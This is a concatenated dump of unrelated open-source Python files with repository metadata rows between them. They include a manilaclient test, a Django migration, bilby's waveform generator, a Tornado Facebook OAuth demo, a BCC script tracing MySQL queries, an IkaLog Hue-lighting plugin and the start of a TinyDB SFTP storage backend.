remote.user if remote else (parsed.username or getpass.getuser())
)
if remote:
path = posixpath.join(
remote.prefix, urlparse(path).path.lstrip("/")
)
else:
path = parsed.path
self.path_info = {
"scheme": "ssh",
"host": host,
"port": port,
"user": user,
"path": path,
}
| 22.862069 | 78 | 0.515837 |
ace06d71e20546895618c8edb4c476b38e02c994 | 1,262 | py | Python | manilaclient/tests/unit/v1/test_security_services.py | SolKuczala/python-manilaclient | 9613c7fd2652dc3c7b8793c9af2b6357f42a4757 | [
"CNRI-Python",
"Apache-1.1"
] | null | null | null | manilaclient/tests/unit/v1/test_security_services.py | SolKuczala/python-manilaclient | 9613c7fd2652dc3c7b8793c9af2b6357f42a4757 | [
"CNRI-Python",
"Apache-1.1"
] | null | null | null | manilaclient/tests/unit/v1/test_security_services.py | SolKuczala/python-manilaclient | 9613c7fd2652dc3c7b8793c9af2b6357f42a4757 | [
"CNRI-Python",
"Apache-1.1"
] | null | null | null | # Copyright 2016 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from manilaclient.tests.unit import utils
class SecurityServicesV1Test(utils.TestCase):
def test_import_v1_security_services_module(self):
try:
from manilaclient.v1 import security_services
except Exception as e:
msg = ("module 'manilaclient.v1.security_services' cannot be "
"imported with error: %s") % six.text_type(e)
assert False, msg
for cls in ('SecurityService', 'SecurityServiceManager'):
msg = "Module 'security_services' has no '%s' attr." % cls
self.assertTrue(hasattr(security_services, cls), msg)
| 38.242424 | 78 | 0.690174 |
ace06f63d0476f3531312207bfbe7ec7c1a3629f | 358 | py | Python | portfolio/migrations/0011_delete_skill.py | ryandingle09/ryandingle-djangoapp | e99f7fe18ab5cdf95beef26905e77aea07b65e41 | [
"MIT"
] | null | null | null | portfolio/migrations/0011_delete_skill.py | ryandingle09/ryandingle-djangoapp | e99f7fe18ab5cdf95beef26905e77aea07b65e41 | [
"MIT"
] | 7 | 2020-06-05T17:46:44.000Z | 2022-03-11T23:17:30.000Z | portfolio/migrations/0011_delete_skill.py | ryandingle09/ryandingle-djangoapp | e99f7fe18ab5cdf95beef26905e77aea07b65e41 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-24 10:59
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('portfolio', '0010_frontcover_image'),
]
operations = [
migrations.DeleteModel(
name='Skill',
),
]
| 18.842105 | 47 | 0.622905 |
ace0703537afbe525e9abaee9fbd3cb997b7b0ce | 10,785 | py | Python | bilby/gw/waveform_generator.py | k-ship/bilby | 916d5c4ee4cdb102f1408bd20bc25fa250ab92f0 | [
"MIT"
] | null | null | null | bilby/gw/waveform_generator.py | k-ship/bilby | 916d5c4ee4cdb102f1408bd20bc25fa250ab92f0 | [
"MIT"
] | null | null | null | bilby/gw/waveform_generator.py | k-ship/bilby | 916d5c4ee4cdb102f1408bd20bc25fa250ab92f0 | [
"MIT"
] | null | null | null | import numpy as np
from ..core import utils
from ..core.series import CoupledTimeAndFrequencySeries
from .utils import PropertyAccessor
class WaveformGenerator(object):
# Delegate these attributes to the coupled time/frequency series stored in
# self._times_and_frequencies, so duration/sampling_frequency/etc. stay
# mutually consistent.
duration = PropertyAccessor('_times_and_frequencies', 'duration')
sampling_frequency = PropertyAccessor('_times_and_frequencies', 'sampling_frequency')
start_time = PropertyAccessor('_times_and_frequencies', 'start_time')
frequency_array = PropertyAccessor('_times_and_frequencies', 'frequency_array')
time_array = PropertyAccessor('_times_and_frequencies', 'time_array')
def __init__(self, duration=None, sampling_frequency=None, start_time=0, frequency_domain_source_model=None,
             time_domain_source_model=None, parameters=None,
             parameter_conversion=None,
             waveform_arguments=None):
    """ A waveform generator

    Parameters
    ----------
    sampling_frequency: float, optional
        The sampling frequency
    duration: float, optional
        Time duration of data
    start_time: float, optional
        Starting time of the time array
    frequency_domain_source_model: func, optional
        A python function taking some arguments and returning the frequency
        domain strain. Note the first argument must be the frequencies at
        which to compute the strain
    time_domain_source_model: func, optional
        A python function taking some arguments and returning the time
        domain strain. Note the first argument must be the times at
        which to compute the strain
    parameters: dict, optional
        Initial values for the parameters
    parameter_conversion: func, optional
        Function to convert from sampled parameters to parameters of the
        waveform generator. Default value is the identity, i.e. it leaves
        the parameters unaffected.
    waveform_arguments: dict, optional
        A dictionary of fixed keyword arguments to pass to either
        `frequency_domain_source_model` or `time_domain_source_model`.

        Note: the arguments of frequency_domain_source_model (except the first,
        which is the frequencies at which to compute the strain) will be added to
        the WaveformGenerator object and initialised to `None`.
    """
    self._times_and_frequencies = CoupledTimeAndFrequencySeries(duration=duration,
                                                                sampling_frequency=sampling_frequency,
                                                                start_time=start_time)
    self.frequency_domain_source_model = frequency_domain_source_model
    self.time_domain_source_model = time_domain_source_model
    self.source_parameter_keys = self.__parameters_from_source_model()
    if parameter_conversion is None:
        self.parameter_conversion = _default_parameter_conversion
    else:
        self.parameter_conversion = parameter_conversion
    if waveform_arguments is not None:
        self.waveform_arguments = waveform_arguments
    else:
        self.waveform_arguments = dict()
    if isinstance(parameters, dict):
        self.parameters = parameters
    # Fix: initialise every key _calculate_strain later reads — the original
    # omitted 'transformed_model', leaving the cache dict with an
    # inconsistent schema until the first strain evaluation.
    self._cache = dict(parameters=None, waveform=None, model=None,
                       transformed_model=None)
def __repr__(self):
    """Return a constructor-style summary naming the source models and converter."""
    # Source-model callables are displayed by __name__, or None when unset.
    if self.frequency_domain_source_model is not None:
        fdsm_name = self.frequency_domain_source_model.__name__
    else:
        fdsm_name = None
    if self.time_domain_source_model is not None:
        tdsm_name = self.time_domain_source_model.__name__
    else:
        tdsm_name = None
    # The default identity converter is an implementation detail, so show None.
    if self.parameter_conversion.__name__ == '_default_parameter_conversion':
        param_conv_name = None
    else:
        param_conv_name = self.parameter_conversion.__name__
    return self.__class__.__name__ + '(duration={}, sampling_frequency={}, start_time={}, ' \
                                     'frequency_domain_source_model={}, time_domain_source_model={}, ' \
                                     'parameter_conversion={}, ' \
                                     'waveform_arguments={})'\
        .format(self.duration, self.sampling_frequency, self.start_time, fdsm_name, tdsm_name,
                param_conv_name, self.waveform_arguments)
def frequency_domain_strain(self, parameters=None):
    """Evaluate the frequency-domain strain for the current (or given) parameters.

    Parameters are first passed through ``self.parameter_conversion``. If
    only a time-domain source model is available, its output is converted
    to the frequency domain via ``utils.nfft``.

    Parameters
    ----------
    parameters: dict, optional
        Parameter values to evaluate at; overwrites ``self.parameters``.
        Falls back to ``self.parameters`` when omitted.

    Returns
    -------
    array_like: The frequency domain strain for the given set of parameters

    Raises
    -------
    RuntimeError: If no source model is given
    """
    fd_model = self.frequency_domain_source_model
    td_model = self.time_domain_source_model
    return self._calculate_strain(model=fd_model,
                                  model_data_points=self.frequency_array,
                                  parameters=parameters,
                                  transformation_function=utils.nfft,
                                  transformed_model=td_model,
                                  transformed_model_data_points=self.time_array)
def time_domain_strain(self, parameters=None):
    """Evaluate the time-domain strain for the current (or given) parameters.

    Parameters are first passed through ``self.parameter_conversion``. If
    only a frequency-domain source model is available, its output is
    converted to the time domain via ``utils.infft``.

    Parameters
    ----------
    parameters: dict, optional
        Parameter values to evaluate at; overwrites ``self.parameters``.
        Falls back to ``self.parameters`` when omitted.

    Returns
    -------
    array_like: The time domain strain for the given set of parameters

    Raises
    -------
    RuntimeError: If no source model is given
    """
    td_model = self.time_domain_source_model
    fd_model = self.frequency_domain_source_model
    return self._calculate_strain(model=td_model,
                                  model_data_points=self.time_array,
                                  parameters=parameters,
                                  transformation_function=utils.infft,
                                  transformed_model=fd_model,
                                  transformed_model_data_points=self.frequency_array)
def _calculate_strain(self, model, model_data_points, transformation_function, transformed_model,
                      transformed_model_data_points, parameters):
    """Core dispatcher: evaluate `model` directly, or `transformed_model`
    followed by `transformation_function`.

    Results are memoised in ``self._cache``: repeated calls with identical
    (converted) parameters and the same model callables return the cached
    waveform without re-evaluating the source model.
    """
    if parameters is not None:
        self.parameters = parameters
    # Cache hit requires matching parameters AND both model callables.
    if self.parameters == self._cache['parameters'] and self._cache['model'] == model and \
            self._cache['transformed_model'] == transformed_model:
        return self._cache['waveform']
    if model is not None:
        model_strain = self._strain_from_model(model_data_points, model)
    elif transformed_model is not None:
        model_strain = self._strain_from_transformed_model(transformed_model_data_points, transformed_model,
                                                           transformation_function)
    else:
        raise RuntimeError("No source model given")
    self._cache['waveform'] = model_strain
    # Copy the parameter dict: self.parameters is replaced/mutated on later calls.
    self._cache['parameters'] = self.parameters.copy()
    self._cache['model'] = model
    self._cache['transformed_model'] = transformed_model
    return model_strain
def _strain_from_model(self, model_data_points, model):
    """Call the source model on its native domain points with the current parameters."""
    return model(model_data_points, **self.parameters)
def _strain_from_transformed_model(self, transformed_model_data_points,
                                   transformed_model, transformation_function):
    """Evaluate the other-domain model and transform it into this domain.

    Array-valued models are transformed directly. Dict-valued models
    (e.g. per-polarisation strains) are transformed key by key; since
    ``utils.nfft`` returns ``(strain, frequencies)``, only the strain part
    is kept in that case.
    """
    raw_strain = self._strain_from_model(
        transformed_model_data_points, transformed_model)
    if isinstance(raw_strain, np.ndarray):
        return transformation_function(raw_strain, self.sampling_frequency)
    model_strain = dict()
    for key, component in raw_strain.items():
        transformed = transformation_function(component, self.sampling_frequency)
        if transformation_function == utils.nfft:
            transformed = transformed[0]
        model_strain[key] = transformed
    return model_strain
@property
def parameters(self):
    """dict: The current parameter key-value pairs for the source model."""
    return self.__parameters
@parameters.setter
def parameters(self, parameters):
    """Convert, filter and store the supplied parameters.

    A copy of *parameters* is run through ``self.parameter_conversion``;
    keys the source function does not accept are then dropped
    (``set.symmetric_difference`` is the opposite of ``set.intersection``),
    and ``self.waveform_arguments`` is merged in last.

    Parameters
    ----------
    parameters: dict
        Input parameter dictionary; the caller's dict is not mutated.
    """
    if not isinstance(parameters, dict):
        raise TypeError('"parameters" must be a dictionary.')
    converted, _ = self.parameter_conversion(parameters.copy())
    # Keys appearing in exactly one of the two sets are not accepted by
    # the source function, so remove them.
    for unused_key in self.source_parameter_keys.symmetric_difference(converted):
        converted.pop(unused_key)
    self.__parameters = converted
    self.__parameters.update(self.waveform_arguments)
def __parameters_from_source_model(self):
    """Infer the named arguments of the active source model.

    Returns
    -------
    set: Argument names of the frequency-domain model when one is set,
        otherwise of the time-domain model.

    Raises
    ------
    AttributeError: If neither source model is provided.
    """
    if self.frequency_domain_source_model is not None:
        chosen_model = self.frequency_domain_source_model
    elif self.time_domain_source_model is not None:
        chosen_model = self.time_domain_source_model
    else:
        raise AttributeError('Either time or frequency domain source '
                             'model must be provided.')
    return set(utils.infer_parameters_from_function(chosen_model))
def _default_parameter_conversion(parameters):
    """Identity parameter conversion.

    Returns the parameters unchanged together with an empty list of
    added keys, matching the ``parameter_conversion`` callable contract.
    (The argument was previously misspelled ``parmeters``; it is only
    ever called positionally, so the rename is safe.)
    """
    return parameters, list()
| 44.20082 | 120 | 0.647288 |
ace0705fc79f0ba48105a5c7792ffee412c56b87 | 4,413 | py | Python | demos/facebook/facebook.py | billychou/tornado | 1ecc7386da17df3f1dfd100845355f7211119a62 | [
"Apache-2.0"
] | 184 | 2015-11-18T16:11:18.000Z | 2021-12-27T06:22:23.000Z | demos/facebook/facebook.py | billychou/tornado | 1ecc7386da17df3f1dfd100845355f7211119a62 | [
"Apache-2.0"
] | 17 | 2015-11-30T15:18:37.000Z | 2022-02-11T03:37:50.000Z | demos/facebook/facebook.py | billychou/tornado | 1ecc7386da17df3f1dfd100845355f7211119a62 | [
"Apache-2.0"
] | 84 | 2015-12-16T01:19:50.000Z | 2022-03-10T05:52:06.000Z | #!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os.path
import tornado.auth
import tornado.escape
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
define("facebook_api_key", help="your Facebook application API key", type=str)
define("facebook_secret", help="your Facebook application secret", type=str)
class Application(tornado.web.Application):
    """Tornado application wiring the demo's URL routes and settings."""

    def __init__(self):
        handlers = [
            (r"/", MainHandler),
            (r"/auth/login", AuthLoginHandler),
            (r"/auth/logout", AuthLogoutHandler),
        ]
        settings = dict(
            # Placeholder secret: must be replaced before deployment.
            cookie_secret="__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__",
            login_url="/auth/login",
            template_path=os.path.join(os.path.dirname(__file__), "templates"),
            static_path=os.path.join(os.path.dirname(__file__), "static"),
            xsrf_cookies=True,
            facebook_api_key=options.facebook_api_key,
            facebook_secret=options.facebook_secret,
            ui_modules={"Post": PostModule},
            debug=True,
            autoescape=None,  # templates emit raw (unescaped) HTML
        )
        tornado.web.Application.__init__(self, handlers, **settings)
class BaseHandler(tornado.web.RequestHandler):
    """Shared base handler: resolves the current user from the secure cookie."""

    def get_current_user(self):
        # None (no cookie) means the user is not logged in; tornado then
        # redirects @authenticated handlers to login_url.
        user_json = self.get_secure_cookie("fbdemo_user")
        if not user_json: return None
        return tornado.escape.json_decode(user_json)
class MainHandler(BaseHandler, tornado.auth.FacebookGraphMixin):
    """Renders the logged-in user's Facebook home stream."""

    @tornado.web.authenticated
    @tornado.web.asynchronous
    def get(self):
        # Asynchronous Graph API call; _on_stream completes the request.
        self.facebook_request("/me/home", self._on_stream,
                              access_token=self.current_user["access_token"])

    def _on_stream(self, stream):
        if stream is None:
            # Session may have expired
            self.redirect("/auth/login")
            return
        self.render("stream.html", stream=stream)
class AuthLoginHandler(BaseHandler, tornado.auth.FacebookGraphMixin):
    """OAuth2 login flow against the Facebook Graph API."""

    @tornado.web.asynchronous
    def get(self):
        # The redirect URI must match on both legs of the OAuth exchange.
        my_url = (self.request.protocol + "://" + self.request.host +
                  "/auth/login?next=" +
                  tornado.escape.url_escape(self.get_argument("next", "/")))
        if self.get_argument("code", False):
            # Second leg: exchange the auth code for an access token.
            self.get_authenticated_user(
                redirect_uri=my_url,
                client_id=self.settings["facebook_api_key"],
                client_secret=self.settings["facebook_secret"],
                code=self.get_argument("code"),
                callback=self._on_auth)
            return
        # First leg: send the user to Facebook's authorization page.
        self.authorize_redirect(redirect_uri=my_url,
                                client_id=self.settings["facebook_api_key"],
                                extra_params={"scope": "read_stream"})

    def _on_auth(self, user):
        if not user:
            raise tornado.web.HTTPError(500, "Facebook auth failed")
        # Persist the authenticated user (including access token) client-side.
        self.set_secure_cookie("fbdemo_user", tornado.escape.json_encode(user))
        self.redirect(self.get_argument("next", "/"))
class AuthLogoutHandler(BaseHandler, tornado.auth.FacebookGraphMixin):
    """Logs the user out by clearing the session cookie."""

    def get(self):
        self.clear_cookie("fbdemo_user")
        self.redirect(self.get_argument("next", "/"))
class PostModule(tornado.web.UIModule):
    """UI module rendering one stream post via modules/post.html."""

    def render(self, post):
        return self.render_string("modules/post.html", post=post)
def main():
    """Parse options, validate Facebook credentials, and start the server."""
    tornado.options.parse_command_line()
    if not (options.facebook_api_key and options.facebook_secret):
        print("--facebook_api_key and --facebook_secret must be set")
        return
    http_server = tornado.httpserver.HTTPServer(Application())
    http_server.listen(options.port)
    # Blocks forever serving requests.
    tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
main()
| 35.58871 | 79 | 0.662588 |
ace070625d7bb177a5fd33fd674131cd6f0b9e49 | 560 | py | Python | packages/python/plotly/plotly/validators/indicator/gauge/axis/_tickmode.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/indicator/gauge/axis/_tickmode.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | packages/python/plotly/plotly/validators/indicator/gauge/axis/_tickmode.py | mastermind88/plotly.py | efa70710df1af22958e1be080e105130042f1839 | [
"MIT"
] | null | null | null | import _plotly_utils.basevalidators
class TickmodeValidator(_plotly_utils.basevalidators.EnumeratedValidator):
    """Enumerated validator for ``indicator.gauge.axis.tickmode``."""

    def __init__(
        self, plotly_name="tickmode", parent_name="indicator.gauge.axis", **kwargs
    ):
        # Pull defaults out of kwargs first so explicit overrides win.
        edit_type = kwargs.pop("edit_type", "plot")
        implied_edits = kwargs.pop("implied_edits", {})
        values = kwargs.pop("values", ["auto", "linear", "array"])
        super(TickmodeValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=edit_type,
            implied_edits=implied_edits,
            values=values,
            **kwargs,
        )
ace070ce0f4dec74dc348e23e2383570784574f6 | 105 | py | Python | aiosubpub/__init__.py | sander76/pypubsub | 7563abea960fc31f2aa7d05e87a3b798cc453793 | [
"MIT"
] | 1 | 2020-05-02T06:06:30.000Z | 2020-05-02T06:06:30.000Z | aiosubpub/__init__.py | sander76/pypubsub | 7563abea960fc31f2aa7d05e87a3b798cc453793 | [
"MIT"
] | null | null | null | aiosubpub/__init__.py | sander76/pypubsub | 7563abea960fc31f2aa7d05e87a3b798cc453793 | [
"MIT"
] | 1 | 2022-02-06T10:11:30.000Z | 2022-02-06T10:11:30.000Z | """Aio sub pub package."""
from .aiosubpub import Channel, Subscription # noqa
__version__ = "1.0.10"
| 17.5 | 52 | 0.695238 |
ace07150da351a5a490980c6e6f043517194fe81 | 1,696 | py | Python | examples/tracing/mysqld_query.py | gtataranni/bcc | b090f5f9eee62796829184ec862e3378a3b7e425 | [
"Apache-2.0"
] | 58 | 2015-08-28T08:46:35.000Z | 2022-02-27T14:31:55.000Z | examples/tracing/mysqld_query.py | gtataranni/bcc | b090f5f9eee62796829184ec862e3378a3b7e425 | [
"Apache-2.0"
] | 1 | 2020-01-23T13:20:33.000Z | 2020-01-23T13:20:33.000Z | examples/tracing/mysqld_query.py | gtataranni/bcc | b090f5f9eee62796829184ec862e3378a3b7e425 | [
"Apache-2.0"
] | 12 | 2017-02-28T02:50:31.000Z | 2021-07-26T17:54:07.000Z | #!/usr/bin/python
#
# mysqld_query Trace MySQL server queries. Example of USDT tracing.
# For Linux, uses BCC, BPF. Embedded C.
#
# USAGE: mysqld_query PID
#
# This uses USDT probes, and needs a MySQL server with -DENABLE_DTRACE=1.
#
# Copyright 2016 Netflix, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
from __future__ import print_function
from bcc import BPF, USDT
from bcc.utils import printb
import sys
# NOTE(review): the usage text says "mysqld_latency" but this script is
# mysqld_query -- confirm the intended message.
if len(sys.argv) < 2:
    print("USAGE: mysqld_latency PID")
    exit()
pid = sys.argv[1]
debug = 0

# load BPF program
# The embedded C is compiled by BCC and attached to the mysqld USDT probe.
bpf_text = """
#include <uapi/linux/ptrace.h>
int do_trace(struct pt_regs *ctx) {
uint64_t addr;
char query[128];
/*
* Read the first argument from the query-start probe, which is the query.
* The format of this probe is:
* query-start(query, connectionid, database, user, host)
* see: https://dev.mysql.com/doc/refman/5.7/en/dba-dtrace-ref-query.html
*/
bpf_usdt_readarg(1, ctx, &addr);
bpf_probe_read(&query, sizeof(query), (void *)addr);
bpf_trace_printk("%s\\n", query);
return 0;
};
"""

# enable USDT probe from given PID
u = USDT(pid=int(pid))
u.enable_probe(probe="query__start", fn_name="do_trace")
if debug:
    print(u.get_text())
    print(bpf_text)

# initialize BPF
b = BPF(text=bpf_text, usdt_contexts=[u])

# header
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "QUERY"))

# format output
# Loops forever printing one line per traced query; Ctrl-C exits.
while 1:
    try:
        (task, pid, cpu, flags, ts, msg) = b.trace_fields()
    except ValueError:
        print("value error")
        continue
    except KeyboardInterrupt:
        exit()
    printb(b"%-18.9f %-16s %-6d %s" % (ts, task, pid, msg))
| 25.69697 | 78 | 0.649764 |
ace0721a88f5c5b0b19cf6b44fb6f39ab867df29 | 6,268 | py | Python | ikalog/outputs/hue.py | joythegreat/IkaLog | 541eb9e910829e2247409f65aa0e684667614403 | [
"Apache-2.0"
] | null | null | null | ikalog/outputs/hue.py | joythegreat/IkaLog | 541eb9e910829e2247409f65aa0e684667614403 | [
"Apache-2.0"
] | null | null | null | ikalog/outputs/hue.py | joythegreat/IkaLog | 541eb9e910829e2247409f65aa0e684667614403 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import traceback
import math
from ikalog.utils import *
# Needed in GUI mode
try:
import wx
except:
pass
# IkaOutput_Hue: "Cameleon" Phillips Hue Lights.
#
class Hue(object):
    """IkaLog output plugin that mirrors in-game team colors on Philips
    Hue lights via the qhue library."""

    def apply_ui(self):
        # Pull the current widget values back into plugin state.
        # NOTE(review): the next two lines look like they should assign
        # self.hueHost and self.hueUsername (cf. refresh_ui /
        # on_config_save_to_context) -- confirm.
        self.enabled = self.checkEnable.GetValue()
        self.editHost = self.editHueHost.GetValue()
        self.dir = self.editHueUsername.GetValue()

    def refresh_ui(self):
        # Push plugin state into the widgets.
        self._internal_update = True
        self.checkEnable.SetValue(self.enabled)
        if not self.hueHost is None:
            self.editHueHost.SetValue(self.hueHost)
        else:
            self.editHueHost.SetValue('')
        if not self.hueUsername is None:
            self.editHueUsername.SetValue(self.hueUsername)
        else:
            self.editHueUsername.SetValue('')

    def on_config_reset(self, context=None):
        # Default configuration: disabled, no bridge credentials.
        self.enabled = False
        self.hueHost = ''
        self.hueUsername = ''

    def on_config_load_from_context(self, context):
        self.on_config_reset(context)
        try:
            conf = context['config']['hue']
        except:
            conf = {}
        if 'Enable' in conf:
            self.enabled = conf['Enable']
        if 'HueHost' in conf:
            self.hueHost = conf['HueHost']
        # NOTE(review): this guard repeats 'HueHost' but assigns
        # hueUsername -- presumably it should test 'HueUsername'; confirm.
        if 'HueHost' in conf:
            self.hueUsername = conf['HueUsername']
        self.refresh_ui()
        return True

    def on_config_save_to_context(self, context):
        context['config']['hue'] = {
            'Enable': self.enabled,
            'HueHost': self.hueHost,
            'HueUsername': self.hueUsername,
        }

    def on_config_apply(self, context):
        self.apply_ui()

    def on_option_tab_create(self, notebook):
        # Build the wx options tab (checkbox + host/user text fields).
        self.panel = wx.Panel(notebook, wx.ID_ANY, size=(640, 360))
        self.page = notebook.InsertPage(0, self.panel, 'Hue')
        self.layout = wx.BoxSizer(wx.VERTICAL)
        self.panel.SetSizer(self.layout)
        self.checkEnable = wx.CheckBox(self.panel, wx.ID_ANY, u'Hue と連携')
        self.editHueHost = wx.TextCtrl(self.panel, wx.ID_ANY, u'hoge')
        self.editHueUsername = wx.TextCtrl(self.panel, wx.ID_ANY, u'hoge')
        # GridSizer's signature differs between wx versions.
        try:
            layout = wx.GridSizer(2, 2)
        except:
            layout = wx.GridSizer(2)
        layout.Add(wx.StaticText(self.panel, wx.ID_ANY, u'ホスト'))
        layout.Add(self.editHueHost)
        layout.Add(wx.StaticText(self.panel, wx.ID_ANY, u'ユーザ'))
        layout.Add(self.editHueUsername)
        self.layout.Add(self.checkEnable)
        self.layout.Add(layout)

    # enhance_color and rgb2xy is imported from:
    # https://gist.githubusercontent.com/error454/6b94c46d1f7512ffe5ee/raw/73b190ce256c3d8dd540cc34e6dae43848cbce4c/gistfile1.py
    # All the rights belongs to the author.
    def enhance_color(self, normalized):
        # sRGB gamma expansion of a 0..1 channel value.
        if normalized > 0.04045:
            return math.pow((normalized + 0.055) / (1.0 + 0.055), 2.4)
        else:
            return normalized / 12.92

    def rgb2xy(self, r, g, b):
        # Convert 0..255 RGB to CIE xy chromaticity used by the Hue API.
        r_norm = r / 255.0
        g_norm = g / 255.0
        b_norm = b / 255.0
        r_final = self.enhance_color(r_norm)
        g_final = self.enhance_color(g_norm)
        b_final = self.enhance_color(b_norm)
        x = r_final * 0.649926 + g_final * 0.103455 + b_final * 0.197109
        y = r_final * 0.234327 + g_final * 0.743075 + b_final * 0.022598
        z = r_final * 0.000000 + g_final * 0.053077 + b_final * 1.035763
        if x + y + z == 0:
            return (0, 0)
        else:
            x_final = x / (x + y + z)
            y_final = y / (x + y + z)
            return (x_final, y_final)

    def light_team_color(self, context):
        # Push the two teams' colors (BGR order) to lights 1 and 2.
        if not ('team_color_bgr' in context['game']):
            return
        if self.hue_bridge is None:
            return
        team1 = context['game']['team_color_bgr'][0]
        team2 = context['game']['team_color_bgr'][1]
        # print(team1, team2)
        c1 = self.rgb2xy(team1[2], team1[1], team1[0])
        c2 = self.rgb2xy(team2[2], team2[1], team2[0])
        # Weighted brightness estimates; currently unused below.
        b1 = (team1[2] * 3 + team1[0] + team1[1] * 3) / 6 / 2
        b2 = (team2[2] * 3 + team2[0] + team2[1] * 3) / 6 / 2
        self.hue_bridge.lights(1, 'state', xy=c1, bri=255, sat=255)
        self.hue_bridge.lights(2, 'state', xy=c2, bri=255, sat=255)

    def on_frame_next(self, context):
        if context['engine']['inGame']:
            self.light_team_color(context)

    def check_import(self):
        # Warn (in Japanese) when the optional qhue dependency is missing.
        try:
            import qhue
        except:
            print("モジュール qhue がロードできませんでした。 Hue 連携ができません。")
            #print("インストールするには以下のコマンドを利用してください。\n    pip install fluent-logger\n")

    ##
    # Constructor
    # @param self The Object Pointer.
    # @param tag tag
    # @param username Username of the player.
    # @param host Fluentd host if Fluentd is on a different node
    # @param port Fluentd port
    # @param username Name the bot use on Slack
    #
    def __init__(self, host=None, user=None):
        self.enabled = (not host is None)
        if not (host and user):
            # No credentials: plugin stays inert.
            self.hue_bridge = None
            return None
        self.check_import()
        import qhue
        try:
            self.hue_bridge = qhue.Bridge(host, user)
        except:
            IkaUtils.dprint('%s: Exception.' % self)
            IkaUtils.dprint(traceback.format_exc())
if __name__ == "__main__":
    # Manual smoke test against a local bridge.
    obj = Hue(host='192.168.44.87', user='newdeveloper')
    # NOTE(review): this context has no 'team_color_bgr' key, so
    # light_team_color() returns early -- confirm the intended fixture.
    context = {
        'game': {
            'inGame': True,
            'color': [[255, 0, 0], [0, 255, 0]],
        }
    }
    obj.light_team_color(context)
| 29.566038 | 128 | 0.592214 |
ace0728f5e597313028aa614bd21aea0f405c2b9 | 115 | py | Python | katas/beta/round_to_next_5.py | the-zebulan/CodeWars | 1eafd1247d60955a5dfb63e4882e8ce86019f43a | [
"MIT"
] | 40 | 2016-03-09T12:26:20.000Z | 2022-03-23T08:44:51.000Z | katas/beta/round_to_next_5.py | akalynych/CodeWars | 1eafd1247d60955a5dfb63e4882e8ce86019f43a | [
"MIT"
] | null | null | null | katas/beta/round_to_next_5.py | akalynych/CodeWars | 1eafd1247d60955a5dfb63e4882e8ce86019f43a | [
"MIT"
] | 36 | 2016-11-07T19:59:58.000Z | 2022-03-31T11:18:27.000Z | def round_to_next5(n):
# return (n + 4) / 5 * 5
q, r = divmod(n, 5)
return n if not r else (q + 1) * 5
| 23 | 38 | 0.504348 |
ace07298386996cce95eadffba0093438bc2c480 | 2,190 | py | Python | casket/sftp_storage.py | emanjavacas/casket | 3edf2ec41c725adbb9a66532fb56a53a7e457f94 | [
"MIT"
] | null | null | null | casket/sftp_storage.py | emanjavacas/casket | 3edf2ec41c725adbb9a66532fb56a53a7e457f94 | [
"MIT"
] | null | null | null | casket/sftp_storage.py | emanjavacas/casket | 3edf2ec41c725adbb9a66532fb56a53a7e457f94 | [
"MIT"
] | null | null | null | # coding: utf-8
import os
import json
from getpass import getpass
from paramiko import SSHClient, AutoAddPolicy
from tinydb import Storage
class WrongPathException(Exception):
    """Raised when an scp-style URL cannot be parsed."""
    pass
def parse_url(url):
    """
    Extracts username, host and filename from a scp like url.

    >>> parse_url('johndoe@localhost:~/filename.txt')
    ('johndoe', 'localhost', '~/filename.txt')

    Splits on the first '@' and the first ':' only, so usernames that
    contain '@' (e.g. email addresses) and filenames that contain ':'
    are handled correctly. Raises WrongPathException on malformed input.
    """
    if '@' not in url:
        raise WrongPathException("Bad url format: missing host")
    # maxsplit=1: everything after the first '@' belongs to host:path.
    username, url = url.split("@", 1)
    if not username:
        raise WrongPathException("Couldn't parse url: missing username")
    if ':' not in url:
        raise WrongPathException("Bad url format: missing filename")
    # maxsplit=1: keep any further ':' as part of the filename.
    host, filename = url.split(':', 1)
    return username, host, filename
def find_home(ssh):
    """Return the remote user's home directory by echoing $HOME."""
    _, stdout, _ = ssh.exec_command("echo $HOME")
    first_line = stdout.readlines()[0]
    return first_line.strip()
class SFTPStorage(Storage):
    """TinyDB storage backend keeping the database file on a remote host,
    accessed over SFTP (paramiko)."""

    def __init__(self, path, password=None, policy='default', **kwargs):
        # path is an scp-style URL: user@host:/remote/file.json
        self.username, self.host, self.path = parse_url(path)
        # Extra kwargs are forwarded to json.dumps() in write().
        self.kwargs = kwargs
        ssh = SSHClient()
        ssh.load_system_host_keys()
